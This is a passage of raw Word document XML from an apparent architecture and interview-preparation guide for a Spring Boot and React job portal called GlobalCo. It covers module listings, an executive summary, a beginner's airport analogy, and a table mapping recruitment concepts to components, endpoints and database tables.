            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Runtime Analysis &amp; Startup Lifecycle, Code-Level Deep Dive, 14 Screen-by-Screen UI Deep Dive with Embedded Screenshots, Algorithms &amp; Business Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Frontend Code &amp; Failure Resiliency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Frontend Component Hierarchy, AuthContext State, Axios Interceptor Pipeline, 20+ 'If I Click This Button' Execution Traces, 20+ 'What Happens If...' Edge Cases &amp; Failure Scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reliability, Testing &amp; Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OWASP Top 10 Security, Error Handling Architecture, Configuration Deep Dive, Dependency Analysis, Automated Testing (11 Tests), Cloud Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Audits &amp; Improvement Roadmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Audit Bugs Found &amp; Fixed, Current Limitations, Phased 1M User Scalability Roadmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Master Interview Preparation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>30-Sec Pitch &amp; 4-Tier Walkthroughs, Top 15 Technical Q&amp;A, Difficult Follow-Ups, 'If Interviewer Opens My Code' Guide, How to Defend Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Expanded Technical Interview Bank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Deep Dive Q&amp;A on JVM, Constructor Injection, B-Tree Indexes, Optimistic vs Pessimistic Locking, React List Keys, useMemo vs useCallback, CORS, AuthN vs AuthZ, 1M User Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Module 13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Learning Path &amp; Revision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Beginner-to-Master Learning Path (Levels 1-12), Technical Glossary (40+ Terms), Traceability Matrix, Cheat Sheet, One-Day Before Interview Revision Guide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The GlobalCo Job Portal is an enterprise-grade, cloud-ready recruitment and applicant tracking system (ATS) engineered to eliminate friction between high-growth enterprises and skilled technical candidates. Built upon a decoupled modern full-stack architecture comprising Java 21 LTS with Spring Boot 3.2.3 on the backend and React 18 with Vite 7 and Tailwind CSS on the frontend, the platform orchestrates the complete talent lifecycle across three distinct security roles: Candidates (Job Seekers), Recruiters (Talent Acquisition Teams), and Platform Administrators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Unlike rudimentary CRUD applications, GlobalCo implements production-level software engineering patterns including stateless JSON Web Token (JWT) authentication with cryptographic HMAC-SHA256 signatures, comprehensive Spring Security 6 Filter Chains, an algorithmic multi-factor Candidate-Job Match Engine (evaluating technical skills, experience tier, and location), a full-lifecycle recruitment ATS pipeline (Applied -&gt; Screening -&gt; Shortlisted -&gt; Interview Scheduled -&gt; Selected -&gt; Offer Sent -&gt; Hired / Rejected), Google Meet interview scheduling integration, dynamic CSV applicant roster exports, and non-repudiable audit logging for administrative governance.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="EFF6FF"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[DOCUMENT INTEGRITY &amp; NOMENCLATURE] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>System Status Badges &amp; Integrity Guarantees:</w:t>
              <w:br/>
              <w:t>• 🟢 CONFIRMED FROM CODE: Validated directly against Java classes, JPA entities, and React components.</w:t>
              <w:br/>
              <w:t>• 🟡 OBSERVED DURING RUNTIME: Verified through active live execution on ports 8080 and 5173.</w:t>
              <w:br/>
              <w:t>• 🔵 INFERRED FROM IMPLEMENTATION: Logical architectural extrapolations from software patterns.</w:t>
              <w:br/>
              <w:t>• 🔴 POTENTIAL ISSUE: Real bugs or edge cases identified during system audits.</w:t>
              <w:br/>
              <w:t>• 🟣 RECOMMENDED IMPROVEMENT: Senior architectural roadmaps for 1M+ user scale.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>2. Project Overview &amp; 'Explain Like I'm a Beginner'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1 The Real-World Airport Analogy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-World Analogy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Imagine GlobalCo as a modern International Airport Terminal for Careers. Just as an airport organizes thousands of passengers, airlines, flights, and security gates without chaos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Airlines are the Enterprise Employers (Google, Microsoft, Amazon, Meta, Netflix) who publish scheduled flights (Job Openings) with specific baggage and passport requirements (Required Technical Skills &amp; Experience).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Passengers are the Job Seekers / Candidates who create digital boarding passes (Profiles &amp; Resumes), check flight schedules (Job Search Catalog), and receive instant compatibility scores (Automated Skill Match Engine).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Gate Agents are the Corporate Recruiters who manage the passenger queue (Applicant Tracking Pipeline), verify boarding credentials (Screening &amp; Shortlisting), conduct gate checks (Technical Interviews), and issue boarding clearance (Binding Job Offers).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Airport Air Traffic Control is the Platform Administrator who monitors all active runways (Platform KPIs), verifies credentials, suspends bad actors (User Moderation), and logs every flight event (System Audit Stream).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2 Conceptual Translation: From Real World to Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">System Translation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Here is how real-world recruitment actions translate into full-stack software components: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1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Real-World Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Frontend Representation (React)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Network Protocol / API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Backend Service (Spring Boot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Database Persistence (SQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Job Posting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobCard.jsx / JobDetailsPage.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/jobs/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobController -&gt; JobService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>jobs, companies, categories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate Profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ProfilePage.jsx (Skills / Bio)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT /api/profiles/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
